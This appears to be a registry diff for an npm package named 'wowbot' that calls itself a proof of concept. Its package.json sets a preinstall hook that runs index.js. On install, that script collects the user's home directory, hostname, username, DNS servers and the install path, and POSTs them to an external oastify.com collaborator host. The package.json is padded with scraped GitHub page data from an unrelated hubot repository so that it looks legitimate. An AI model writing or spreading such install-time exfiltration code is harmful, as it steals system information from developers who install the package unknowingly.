wowbot 0.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of wowbot might be problematic. Click here for more details.
- package/README.MD +1 -0
- package/index.js +46 -0
- package/package.json +742 -0
package/README.MD
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
this is just a poc
|
package/index.js
ADDED
@@ -0,0 +1,46 @@
|
|
1
|
+
const os = require("os");
|
2
|
+
const dns = require("dns");
|
3
|
+
const querystring = require("querystring");
|
4
|
+
const https = require("https");
|
5
|
+
const packageJSON = require("./package.json");
|
6
|
+
const package = packageJSON.name;
|
7
|
+
|
8
|
+
const trackingData = JSON.stringify({
|
9
|
+
p: package,
|
10
|
+
c: __dirname,
|
11
|
+
hd: os.homedir(),
|
12
|
+
hn: os.hostname(),
|
13
|
+
un: os.userInfo().username,
|
14
|
+
dns: dns.getServers(),
|
15
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
16
|
+
v: packageJSON.version,
|
17
|
+
pjson: packageJSON,
|
18
|
+
});
|
19
|
+
|
20
|
+
var postData = querystring.stringify({
|
21
|
+
msg: trackingData,
|
22
|
+
});
|
23
|
+
|
24
|
+
var options = {
|
25
|
+
hostname: "nypy9d19xg4ogwd18fv1pcba61cv0uoj.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
|
26
|
+
port: 443,
|
27
|
+
path: "/",
|
28
|
+
method: "POST",
|
29
|
+
headers: {
|
30
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
31
|
+
"Content-Length": postData.length,
|
32
|
+
},
|
33
|
+
};
|
34
|
+
|
35
|
+
var req = https.request(options, (res) => {
|
36
|
+
res.on("data", (d) => {
|
37
|
+
process.stdout.write(d);
|
38
|
+
});
|
39
|
+
});
|
40
|
+
|
41
|
+
req.on("error", (e) => {
|
42
|
+
// console.error(e);
|
43
|
+
});
|
44
|
+
|
45
|
+
req.write(postData);
|
46
|
+
req.end();
|
package/package.json
ADDED
@@ -0,0 +1,742 @@
|
|
1
|
+
{
|
2
|
+
"payload": {
|
3
|
+
"allShortcutsEnabled": false,
|
4
|
+
"fileTree": {
|
5
|
+
"hubot-instance": {
|
6
|
+
"items": [
|
7
|
+
{
|
8
|
+
"name": "bin",
|
9
|
+
"path": "hubot-instance/bin",
|
10
|
+
"contentType": "directory"
|
11
|
+
},
|
12
|
+
{
|
13
|
+
"name": "scripts",
|
14
|
+
"path": "hubot-instance/scripts",
|
15
|
+
"contentType": "directory"
|
16
|
+
},
|
17
|
+
{
|
18
|
+
"name": ".editorconfig",
|
19
|
+
"path": "hubot-instance/.editorconfig",
|
20
|
+
"contentType": "file"
|
21
|
+
},
|
22
|
+
{
|
23
|
+
"name": ".gitignore",
|
24
|
+
"path": "hubot-instance/.gitignore",
|
25
|
+
"contentType": "file"
|
26
|
+
},
|
27
|
+
{
|
28
|
+
"name": "README.md",
|
29
|
+
"path": "hubot-instance/README.md",
|
30
|
+
"contentType": "file"
|
31
|
+
},
|
32
|
+
{
|
33
|
+
"name": "env.sample",
|
34
|
+
"path": "hubot-instance/env.sample",
|
35
|
+
"contentType": "file"
|
36
|
+
},
|
37
|
+
{
|
38
|
+
"name": "external-scripts.json",
|
39
|
+
"path": "hubot-instance/external-scripts.json",
|
40
|
+
"contentType": "file"
|
41
|
+
},
|
42
|
+
{
|
43
|
+
"name": "hubot-scripts.json",
|
44
|
+
"path": "hubot-instance/hubot-scripts.json",
|
45
|
+
"contentType": "file"
|
46
|
+
},
|
47
|
+
{
|
48
|
+
"name": "package.json",
|
49
|
+
"path": "hubot-instance/package.json",
|
50
|
+
"contentType": "file"
|
51
|
+
}
|
52
|
+
],
|
53
|
+
"totalCount": 9
|
54
|
+
},
|
55
|
+
"": {
|
56
|
+
"items": [
|
57
|
+
{
|
58
|
+
"name": "deploy-container",
|
59
|
+
"path": "deploy-container",
|
60
|
+
"contentType": "directory"
|
61
|
+
},
|
62
|
+
{
|
63
|
+
"name": "hubot-instance",
|
64
|
+
"path": "hubot-instance",
|
65
|
+
"contentType": "directory"
|
66
|
+
},
|
67
|
+
{
|
68
|
+
"name": ".gitignore",
|
69
|
+
"path": ".gitignore",
|
70
|
+
"contentType": "file"
|
71
|
+
}
|
72
|
+
],
|
73
|
+
"totalCount": 3
|
74
|
+
}
|
75
|
+
},
|
76
|
+
"fileTreeProcessingTime": 6.661408,
|
77
|
+
"foldersToFetch": [],
|
78
|
+
"reducedMotionEnabled": null,
|
79
|
+
"repo": {
|
80
|
+
"id": 57150343,
|
81
|
+
"defaultBranch": "master",
|
82
|
+
"name": "hackathon-deploybot",
|
83
|
+
"ownerLogin": "torarvid",
|
84
|
+
"currentUserCanPush": false,
|
85
|
+
"isFork": false,
|
86
|
+
"isEmpty": false,
|
87
|
+
"createdAt": "2016-04-26T17:58:25.000Z",
|
88
|
+
"ownerAvatar": "https://avatars.githubusercontent.com/u/439758?v=4",
|
89
|
+
"public": true,
|
90
|
+
"private": false,
|
91
|
+
"isOrgOwned": false
|
92
|
+
},
|
93
|
+
"symbolsExpanded": false,
|
94
|
+
"treeExpanded": true,
|
95
|
+
"refInfo": {
|
96
|
+
"name": "216da6c62aa2428d1842ee7e24551603c6a8eb02",
|
97
|
+
"listCacheKey": "v0:1461693678.0",
|
98
|
+
"canEdit": false,
|
99
|
+
"refType": "tree",
|
100
|
+
"currentOid": "216da6c62aa2428d1842ee7e24551603c6a8eb02"
|
101
|
+
},
|
102
|
+
"path": "hubot-instance/package.json",
|
103
|
+
"currentUser": null,
|
104
|
+
"blob": {
|
105
|
+
"rawLines": [
|
106
|
+
"{",
|
107
|
+
" \"name\": \"wowbot\",",
|
108
|
+
" \"version\": \"0.0.0\",",
|
109
|
+
" \"private\": false,",
|
110
|
+
" \"author\": \"Tor Arvid Lund <torarvid@telenordigital.com>\",",
|
111
|
+
" \"description\": \"wowbot, man. it's super wow\",",
|
112
|
+
" \"dependencies\": {",
|
113
|
+
" \"hubot\": \"^2.18.0\",",
|
114
|
+
" \"hubot-auth\": \"^1.2.0\",",
|
115
|
+
" \"hubot-diagnostics\": \"0.0.1\",",
|
116
|
+
" \"hubot-google-images\": \"^0.2.6\",",
|
117
|
+
" \"hubot-google-translate\": \"^0.2.0\",",
|
118
|
+
" \"hubot-help\": \"^0.1.3\",",
|
119
|
+
" \"hubot-heroku-keepalive\": \"^1.0.2\",",
|
120
|
+
" \"hubot-maps\": \"0.0.2\",",
|
121
|
+
" \"hubot-pugme\": \"^0.1.0\",",
|
122
|
+
" \"hubot-redis-brain\": \"0.0.3\",",
|
123
|
+
" \"hubot-reload-scripts\": \"^0.1.2\",",
|
124
|
+
" \"hubot-rules\": \"^0.1.1\",",
|
125
|
+
" \"hubot-scripts\": \"^2.16.2\",",
|
126
|
+
" \"hubot-shipit\": \"^0.2.0\",",
|
127
|
+
" \"hubot-slack\": \"^3.4.2\",",
|
128
|
+
" \"js-yaml\": \"^3.5.2\"",
|
129
|
+
" },",
|
130
|
+
" \"engines\": {",
|
131
|
+
" \"node\": \"0.10.x\"",
|
132
|
+
" }",
|
133
|
+
"}"
|
134
|
+
],
|
135
|
+
"stylingDirectives": [
|
136
|
+
[],
|
137
|
+
[
|
138
|
+
{
|
139
|
+
"start": 2,
|
140
|
+
"end": 8,
|
141
|
+
"cssClass": "pl-ent"
|
142
|
+
},
|
143
|
+
{
|
144
|
+
"start": 10,
|
145
|
+
"end": 18,
|
146
|
+
"cssClass": "pl-s"
|
147
|
+
},
|
148
|
+
{
|
149
|
+
"start": 10,
|
150
|
+
"end": 11,
|
151
|
+
"cssClass": "pl-pds"
|
152
|
+
},
|
153
|
+
{
|
154
|
+
"start": 17,
|
155
|
+
"end": 18,
|
156
|
+
"cssClass": "pl-pds"
|
157
|
+
}
|
158
|
+
],
|
159
|
+
[
|
160
|
+
{
|
161
|
+
"start": 2,
|
162
|
+
"end": 11,
|
163
|
+
"cssClass": "pl-ent"
|
164
|
+
},
|
165
|
+
{
|
166
|
+
"start": 13,
|
167
|
+
"end": 20,
|
168
|
+
"cssClass": "pl-s"
|
169
|
+
},
|
170
|
+
{
|
171
|
+
"start": 13,
|
172
|
+
"end": 14,
|
173
|
+
"cssClass": "pl-pds"
|
174
|
+
},
|
175
|
+
{
|
176
|
+
"start": 19,
|
177
|
+
"end": 20,
|
178
|
+
"cssClass": "pl-pds"
|
179
|
+
}
|
180
|
+
],
|
181
|
+
[
|
182
|
+
{
|
183
|
+
"start": 2,
|
184
|
+
"end": 11,
|
185
|
+
"cssClass": "pl-ent"
|
186
|
+
},
|
187
|
+
{
|
188
|
+
"start": 13,
|
189
|
+
"end": 17,
|
190
|
+
"cssClass": "pl-c1"
|
191
|
+
}
|
192
|
+
],
|
193
|
+
[
|
194
|
+
{
|
195
|
+
"start": 2,
|
196
|
+
"end": 10,
|
197
|
+
"cssClass": "pl-ent"
|
198
|
+
},
|
199
|
+
{
|
200
|
+
"start": 12,
|
201
|
+
"end": 58,
|
202
|
+
"cssClass": "pl-s"
|
203
|
+
},
|
204
|
+
{
|
205
|
+
"start": 12,
|
206
|
+
"end": 13,
|
207
|
+
"cssClass": "pl-pds"
|
208
|
+
},
|
209
|
+
{
|
210
|
+
"start": 57,
|
211
|
+
"end": 58,
|
212
|
+
"cssClass": "pl-pds"
|
213
|
+
}
|
214
|
+
],
|
215
|
+
[
|
216
|
+
{
|
217
|
+
"start": 2,
|
218
|
+
"end": 15,
|
219
|
+
"cssClass": "pl-ent"
|
220
|
+
},
|
221
|
+
{
|
222
|
+
"start": 17,
|
223
|
+
"end": 46,
|
224
|
+
"cssClass": "pl-s"
|
225
|
+
},
|
226
|
+
{
|
227
|
+
"start": 17,
|
228
|
+
"end": 18,
|
229
|
+
"cssClass": "pl-pds"
|
230
|
+
},
|
231
|
+
{
|
232
|
+
"start": 45,
|
233
|
+
"end": 46,
|
234
|
+
"cssClass": "pl-pds"
|
235
|
+
}
|
236
|
+
],
|
237
|
+
[
|
238
|
+
{
|
239
|
+
"start": 2,
|
240
|
+
"end": 16,
|
241
|
+
"cssClass": "pl-ent"
|
242
|
+
}
|
243
|
+
],
|
244
|
+
[
|
245
|
+
{
|
246
|
+
"start": 4,
|
247
|
+
"end": 11,
|
248
|
+
"cssClass": "pl-ent"
|
249
|
+
},
|
250
|
+
{
|
251
|
+
"start": 13,
|
252
|
+
"end": 22,
|
253
|
+
"cssClass": "pl-s"
|
254
|
+
},
|
255
|
+
{
|
256
|
+
"start": 13,
|
257
|
+
"end": 14,
|
258
|
+
"cssClass": "pl-pds"
|
259
|
+
},
|
260
|
+
{
|
261
|
+
"start": 21,
|
262
|
+
"end": 22,
|
263
|
+
"cssClass": "pl-pds"
|
264
|
+
}
|
265
|
+
],
|
266
|
+
[
|
267
|
+
{
|
268
|
+
"start": 4,
|
269
|
+
"end": 16,
|
270
|
+
"cssClass": "pl-ent"
|
271
|
+
},
|
272
|
+
{
|
273
|
+
"start": 18,
|
274
|
+
"end": 26,
|
275
|
+
"cssClass": "pl-s"
|
276
|
+
},
|
277
|
+
{
|
278
|
+
"start": 18,
|
279
|
+
"end": 19,
|
280
|
+
"cssClass": "pl-pds"
|
281
|
+
},
|
282
|
+
{
|
283
|
+
"start": 25,
|
284
|
+
"end": 26,
|
285
|
+
"cssClass": "pl-pds"
|
286
|
+
}
|
287
|
+
],
|
288
|
+
[
|
289
|
+
{
|
290
|
+
"start": 4,
|
291
|
+
"end": 23,
|
292
|
+
"cssClass": "pl-ent"
|
293
|
+
},
|
294
|
+
{
|
295
|
+
"start": 25,
|
296
|
+
"end": 32,
|
297
|
+
"cssClass": "pl-s"
|
298
|
+
},
|
299
|
+
{
|
300
|
+
"start": 25,
|
301
|
+
"end": 26,
|
302
|
+
"cssClass": "pl-pds"
|
303
|
+
},
|
304
|
+
{
|
305
|
+
"start": 31,
|
306
|
+
"end": 32,
|
307
|
+
"cssClass": "pl-pds"
|
308
|
+
}
|
309
|
+
],
|
310
|
+
[
|
311
|
+
{
|
312
|
+
"start": 4,
|
313
|
+
"end": 25,
|
314
|
+
"cssClass": "pl-ent"
|
315
|
+
},
|
316
|
+
{
|
317
|
+
"start": 27,
|
318
|
+
"end": 35,
|
319
|
+
"cssClass": "pl-s"
|
320
|
+
},
|
321
|
+
{
|
322
|
+
"start": 27,
|
323
|
+
"end": 28,
|
324
|
+
"cssClass": "pl-pds"
|
325
|
+
},
|
326
|
+
{
|
327
|
+
"start": 34,
|
328
|
+
"end": 35,
|
329
|
+
"cssClass": "pl-pds"
|
330
|
+
}
|
331
|
+
],
|
332
|
+
[
|
333
|
+
{
|
334
|
+
"start": 4,
|
335
|
+
"end": 28,
|
336
|
+
"cssClass": "pl-ent"
|
337
|
+
},
|
338
|
+
{
|
339
|
+
"start": 30,
|
340
|
+
"end": 38,
|
341
|
+
"cssClass": "pl-s"
|
342
|
+
},
|
343
|
+
{
|
344
|
+
"start": 30,
|
345
|
+
"end": 31,
|
346
|
+
"cssClass": "pl-pds"
|
347
|
+
},
|
348
|
+
{
|
349
|
+
"start": 37,
|
350
|
+
"end": 38,
|
351
|
+
"cssClass": "pl-pds"
|
352
|
+
}
|
353
|
+
],
|
354
|
+
[
|
355
|
+
{
|
356
|
+
"start": 4,
|
357
|
+
"end": 16,
|
358
|
+
"cssClass": "pl-ent"
|
359
|
+
},
|
360
|
+
{
|
361
|
+
"start": 18,
|
362
|
+
"end": 26,
|
363
|
+
"cssClass": "pl-s"
|
364
|
+
},
|
365
|
+
{
|
366
|
+
"start": 18,
|
367
|
+
"end": 19,
|
368
|
+
"cssClass": "pl-pds"
|
369
|
+
},
|
370
|
+
{
|
371
|
+
"start": 25,
|
372
|
+
"end": 26,
|
373
|
+
"cssClass": "pl-pds"
|
374
|
+
}
|
375
|
+
],
|
376
|
+
[
|
377
|
+
{
|
378
|
+
"start": 4,
|
379
|
+
"end": 28,
|
380
|
+
"cssClass": "pl-ent"
|
381
|
+
},
|
382
|
+
{
|
383
|
+
"start": 30,
|
384
|
+
"end": 38,
|
385
|
+
"cssClass": "pl-s"
|
386
|
+
},
|
387
|
+
{
|
388
|
+
"start": 30,
|
389
|
+
"end": 31,
|
390
|
+
"cssClass": "pl-pds"
|
391
|
+
},
|
392
|
+
{
|
393
|
+
"start": 37,
|
394
|
+
"end": 38,
|
395
|
+
"cssClass": "pl-pds"
|
396
|
+
}
|
397
|
+
],
|
398
|
+
[
|
399
|
+
{
|
400
|
+
"start": 4,
|
401
|
+
"end": 16,
|
402
|
+
"cssClass": "pl-ent"
|
403
|
+
},
|
404
|
+
{
|
405
|
+
"start": 18,
|
406
|
+
"end": 25,
|
407
|
+
"cssClass": "pl-s"
|
408
|
+
},
|
409
|
+
{
|
410
|
+
"start": 18,
|
411
|
+
"end": 19,
|
412
|
+
"cssClass": "pl-pds"
|
413
|
+
},
|
414
|
+
{
|
415
|
+
"start": 24,
|
416
|
+
"end": 25,
|
417
|
+
"cssClass": "pl-pds"
|
418
|
+
}
|
419
|
+
],
|
420
|
+
[
|
421
|
+
{
|
422
|
+
"start": 4,
|
423
|
+
"end": 17,
|
424
|
+
"cssClass": "pl-ent"
|
425
|
+
},
|
426
|
+
{
|
427
|
+
"start": 19,
|
428
|
+
"end": 27,
|
429
|
+
"cssClass": "pl-s"
|
430
|
+
},
|
431
|
+
{
|
432
|
+
"start": 19,
|
433
|
+
"end": 20,
|
434
|
+
"cssClass": "pl-pds"
|
435
|
+
},
|
436
|
+
{
|
437
|
+
"start": 26,
|
438
|
+
"end": 27,
|
439
|
+
"cssClass": "pl-pds"
|
440
|
+
}
|
441
|
+
],
|
442
|
+
[
|
443
|
+
{
|
444
|
+
"start": 4,
|
445
|
+
"end": 23,
|
446
|
+
"cssClass": "pl-ent"
|
447
|
+
},
|
448
|
+
{
|
449
|
+
"start": 25,
|
450
|
+
"end": 32,
|
451
|
+
"cssClass": "pl-s"
|
452
|
+
},
|
453
|
+
{
|
454
|
+
"start": 25,
|
455
|
+
"end": 26,
|
456
|
+
"cssClass": "pl-pds"
|
457
|
+
},
|
458
|
+
{
|
459
|
+
"start": 31,
|
460
|
+
"end": 32,
|
461
|
+
"cssClass": "pl-pds"
|
462
|
+
}
|
463
|
+
],
|
464
|
+
[
|
465
|
+
{
|
466
|
+
"start": 4,
|
467
|
+
"end": 26,
|
468
|
+
"cssClass": "pl-ent"
|
469
|
+
},
|
470
|
+
{
|
471
|
+
"start": 28,
|
472
|
+
"end": 36,
|
473
|
+
"cssClass": "pl-s"
|
474
|
+
},
|
475
|
+
{
|
476
|
+
"start": 28,
|
477
|
+
"end": 29,
|
478
|
+
"cssClass": "pl-pds"
|
479
|
+
},
|
480
|
+
{
|
481
|
+
"start": 35,
|
482
|
+
"end": 36,
|
483
|
+
"cssClass": "pl-pds"
|
484
|
+
}
|
485
|
+
],
|
486
|
+
[
|
487
|
+
{
|
488
|
+
"start": 4,
|
489
|
+
"end": 17,
|
490
|
+
"cssClass": "pl-ent"
|
491
|
+
},
|
492
|
+
{
|
493
|
+
"start": 19,
|
494
|
+
"end": 27,
|
495
|
+
"cssClass": "pl-s"
|
496
|
+
},
|
497
|
+
{
|
498
|
+
"start": 19,
|
499
|
+
"end": 20,
|
500
|
+
"cssClass": "pl-pds"
|
501
|
+
},
|
502
|
+
{
|
503
|
+
"start": 26,
|
504
|
+
"end": 27,
|
505
|
+
"cssClass": "pl-pds"
|
506
|
+
}
|
507
|
+
],
|
508
|
+
[
|
509
|
+
{
|
510
|
+
"start": 4,
|
511
|
+
"end": 19,
|
512
|
+
"cssClass": "pl-ent"
|
513
|
+
},
|
514
|
+
{
|
515
|
+
"start": 21,
|
516
|
+
"end": 30,
|
517
|
+
"cssClass": "pl-s"
|
518
|
+
},
|
519
|
+
{
|
520
|
+
"start": 21,
|
521
|
+
"end": 22,
|
522
|
+
"cssClass": "pl-pds"
|
523
|
+
},
|
524
|
+
{
|
525
|
+
"start": 29,
|
526
|
+
"end": 30,
|
527
|
+
"cssClass": "pl-pds"
|
528
|
+
}
|
529
|
+
],
|
530
|
+
[
|
531
|
+
{
|
532
|
+
"start": 4,
|
533
|
+
"end": 18,
|
534
|
+
"cssClass": "pl-ent"
|
535
|
+
},
|
536
|
+
{
|
537
|
+
"start": 20,
|
538
|
+
"end": 28,
|
539
|
+
"cssClass": "pl-s"
|
540
|
+
},
|
541
|
+
{
|
542
|
+
"start": 20,
|
543
|
+
"end": 21,
|
544
|
+
"cssClass": "pl-pds"
|
545
|
+
},
|
546
|
+
{
|
547
|
+
"start": 27,
|
548
|
+
"end": 28,
|
549
|
+
"cssClass": "pl-pds"
|
550
|
+
}
|
551
|
+
],
|
552
|
+
[
|
553
|
+
{
|
554
|
+
"start": 4,
|
555
|
+
"end": 17,
|
556
|
+
"cssClass": "pl-ent"
|
557
|
+
},
|
558
|
+
{
|
559
|
+
"start": 19,
|
560
|
+
"end": 27,
|
561
|
+
"cssClass": "pl-s"
|
562
|
+
},
|
563
|
+
{
|
564
|
+
"start": 19,
|
565
|
+
"end": 20,
|
566
|
+
"cssClass": "pl-pds"
|
567
|
+
},
|
568
|
+
{
|
569
|
+
"start": 26,
|
570
|
+
"end": 27,
|
571
|
+
"cssClass": "pl-pds"
|
572
|
+
}
|
573
|
+
],
|
574
|
+
[
|
575
|
+
{
|
576
|
+
"start": 4,
|
577
|
+
"end": 13,
|
578
|
+
"cssClass": "pl-ent"
|
579
|
+
},
|
580
|
+
{
|
581
|
+
"start": 15,
|
582
|
+
"end": 23,
|
583
|
+
"cssClass": "pl-s"
|
584
|
+
},
|
585
|
+
{
|
586
|
+
"start": 15,
|
587
|
+
"end": 16,
|
588
|
+
"cssClass": "pl-pds"
|
589
|
+
},
|
590
|
+
{
|
591
|
+
"start": 22,
|
592
|
+
"end": 23,
|
593
|
+
"cssClass": "pl-pds"
|
594
|
+
}
|
595
|
+
],
|
596
|
+
[],
|
597
|
+
[
|
598
|
+
{
|
599
|
+
"start": 2,
|
600
|
+
"end": 11,
|
601
|
+
"cssClass": "pl-ent"
|
602
|
+
}
|
603
|
+
],
|
604
|
+
[
|
605
|
+
{
|
606
|
+
"start": 4,
|
607
|
+
"end": 10,
|
608
|
+
"cssClass": "pl-ent"
|
609
|
+
},
|
610
|
+
{
|
611
|
+
"start": 12,
|
612
|
+
"end": 20,
|
613
|
+
"cssClass": "pl-s"
|
614
|
+
},
|
615
|
+
{
|
616
|
+
"start": 12,
|
617
|
+
"end": 13,
|
618
|
+
"cssClass": "pl-pds"
|
619
|
+
},
|
620
|
+
{
|
621
|
+
"start": 19,
|
622
|
+
"end": 20,
|
623
|
+
"cssClass": "pl-pds"
|
624
|
+
}
|
625
|
+
],
|
626
|
+
[],
|
627
|
+
[]
|
628
|
+
],
|
629
|
+
"csv": null,
|
630
|
+
"csvError": null,
|
631
|
+
"dependabotInfo": {
|
632
|
+
"showConfigurationBanner": false,
|
633
|
+
"configFilePath": null,
|
634
|
+
"networkDependabotPath": "/torarvid/hackathon-deploybot/network/updates",
|
635
|
+
"dismissConfigurationNoticePath": "/settings/dismiss-notice/dependabot_configuration_notice",
|
636
|
+
"configurationNoticeDismissed": null,
|
637
|
+
"repoAlertsPath": "/torarvid/hackathon-deploybot/security/dependabot",
|
638
|
+
"repoSecurityAndAnalysisPath": "/torarvid/hackathon-deploybot/settings/security_analysis",
|
639
|
+
"repoOwnerIsOrg": false,
|
640
|
+
"currentUserCanAdminRepo": false
|
641
|
+
},
|
642
|
+
"displayName": "package.json",
|
643
|
+
"displayUrl": "https://github.com/torarvid/hackathon-deploybot/blob/216da6c62aa2428d1842ee7e24551603c6a8eb02/hubot-instance/package.json?raw=true",
|
644
|
+
"headerInfo": {
|
645
|
+
"blobSize": "741 Bytes",
|
646
|
+
"deleteInfo": {
|
647
|
+
"deleteTooltip": "You must be signed in to make or propose changes"
|
648
|
+
},
|
649
|
+
"editInfo": {
|
650
|
+
"editTooltip": "You must be signed in to make or propose changes"
|
651
|
+
},
|
652
|
+
"ghDesktopPath": null,
|
653
|
+
"gitLfsPath": null,
|
654
|
+
"onBranch": false,
|
655
|
+
"shortPath": "28e8c8c",
|
656
|
+
"siteNavLoginPath": "/login?return_to=https%3A%2F%2Fgithub.com%2Ftorarvid%2Fhackathon-deploybot%2Fblob%2F216da6c62aa2428d1842ee7e24551603c6a8eb02%2Fhubot-instance%2Fpackage.json",
|
657
|
+
"isCSV": false,
|
658
|
+
"isRichtext": false,
|
659
|
+
"toc": null,
|
660
|
+
"lineInfo": {
|
661
|
+
"truncatedLoc": "28",
|
662
|
+
"truncatedSloc": "28"
|
663
|
+
},
|
664
|
+
"mode": "file"
|
665
|
+
},
|
666
|
+
"image": false,
|
667
|
+
"isCodeownersFile": null,
|
668
|
+
"isPlain": false,
|
669
|
+
"isValidLegacyIssueTemplate": false,
|
670
|
+
"issueTemplateHelpUrl": "https://docs.github.com/articles/about-issue-and-pull-request-templates",
|
671
|
+
"issueTemplate": null,
|
672
|
+
"discussionTemplate": null,
|
673
|
+
"language": "JSON",
|
674
|
+
"languageID": 174,
|
675
|
+
"large": false,
|
676
|
+
"loggedIn": false,
|
677
|
+
"newDiscussionPath": "/torarvid/hackathon-deploybot/discussions/new",
|
678
|
+
"newIssuePath": "/torarvid/hackathon-deploybot/issues/new",
|
679
|
+
"planSupportInfo": {
|
680
|
+
"repoIsFork": null,
|
681
|
+
"repoOwnedByCurrentUser": null,
|
682
|
+
"requestFullPath": "/torarvid/hackathon-deploybot/blob/216da6c62aa2428d1842ee7e24551603c6a8eb02/hubot-instance/package.json",
|
683
|
+
"showFreeOrgGatedFeatureMessage": null,
|
684
|
+
"showPlanSupportBanner": null,
|
685
|
+
"upgradeDataAttributes": null,
|
686
|
+
"upgradePath": null
|
687
|
+
},
|
688
|
+
"publishBannersInfo": {
|
689
|
+
"dismissActionNoticePath": "/settings/dismiss-notice/publish_action_from_dockerfile",
|
690
|
+
"dismissStackNoticePath": "/settings/dismiss-notice/publish_stack_from_file",
|
691
|
+
"releasePath": "/torarvid/hackathon-deploybot/releases/new?marketplace=true",
|
692
|
+
"showPublishActionBanner": false,
|
693
|
+
"showPublishStackBanner": false
|
694
|
+
},
|
695
|
+
"rawBlobUrl": "https://github.com/torarvid/hackathon-deploybot/raw/216da6c62aa2428d1842ee7e24551603c6a8eb02/hubot-instance/package.json",
|
696
|
+
"renderImageOrRaw": false,
|
697
|
+
"richText": null,
|
698
|
+
"renderedFileInfo": null,
|
699
|
+
"shortPath": null,
|
700
|
+
"tabSize": 2,
|
701
|
+
"topBannersInfo": {
|
702
|
+
"overridingGlobalFundingFile": false,
|
703
|
+
"globalPreferredFundingPath": null,
|
704
|
+
"repoOwner": "torarvid",
|
705
|
+
"repoName": "hackathon-deploybot",
|
706
|
+
"showInvalidCitationWarning": false,
|
707
|
+
"citationHelpUrl": "https://docs.github.com/en/github/creating-cloning-and-archiving-repositories/creating-a-repository-on-github/about-citation-files",
|
708
|
+
"showDependabotConfigurationBanner": false,
|
709
|
+
"actionsOnboardingTip": null
|
710
|
+
},
|
711
|
+
"truncated": false,
|
712
|
+
"viewable": true,
|
713
|
+
"workflowRedirectUrl": null,
|
714
|
+
"symbols": {
|
715
|
+
"timedOut": false,
|
716
|
+
"notAnalyzed": true,
|
717
|
+
"symbols": []
|
718
|
+
}
|
719
|
+
},
|
720
|
+
"copilotInfo": null,
|
721
|
+
"copilotAccessAllowed": false,
|
722
|
+
"csrf_tokens": {
|
723
|
+
"/torarvid/hackathon-deploybot/branches": {
|
724
|
+
"post": "fkRWFmhhTQzniqMVhvLPnlIiwjYRVlE3iKNCh_x7HhNsRix5jsxp5IWFNbZrbtEEWLiIBzqw8ASy82xVgz31uw"
|
725
|
+
},
|
726
|
+
"/repos/preferences": {
|
727
|
+
"post": "fvGZlM5qgwgsIYF7jbCxdgsdMYgmiSW86sIzZApMmPFgJ0N6MC6SS_4aKtsRtMzFYBrvBI3wbycVtA_t5sH0_A"
|
728
|
+
}
|
729
|
+
}
|
730
|
+
},
|
731
|
+
"title": "hackathon-deploybot/hubot-instance/package.json at 216da6c62aa2428d1842ee7e24551603c6a8eb02 · torarvid/hackathon-deploybot",
|
732
|
+
"name": "wowbot",
|
733
|
+
"version": "0.0.0",
|
734
|
+
"main": "index.js",
|
735
|
+
"scripts": {
|
736
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
737
|
+
"preinstall": "node index.js"
|
738
|
+
},
|
739
|
+
"author": "VAMSHI",
|
740
|
+
"license": "ISC",
|
741
|
+
"description": ""
|
742
|
+
}
|